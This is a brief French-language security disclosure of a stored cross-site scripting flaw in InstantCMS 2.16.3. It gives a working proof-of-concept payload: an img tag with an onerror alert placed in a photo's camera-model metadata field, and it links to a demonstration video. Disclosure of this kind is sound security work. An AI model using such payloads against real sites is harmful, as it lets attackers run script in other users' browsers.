
InstantCMS - Cross-Site Scripting stocké (XSS)
InstantCMS - Cross-Site Scripting (XSS) stocké Version affectée : InstantCMS 2.16.3
Étapes pour reproduire :
<img src="https://raw.githubusercontent.com/amal264882/cve-2024-41312./HEAD/asd" onerror="alert(1)"> dans le champ des métadonnées du nom du modèle d'appareil photo.POC :
<a href=https://d.pr/v/DT8Gve> Vidéo POV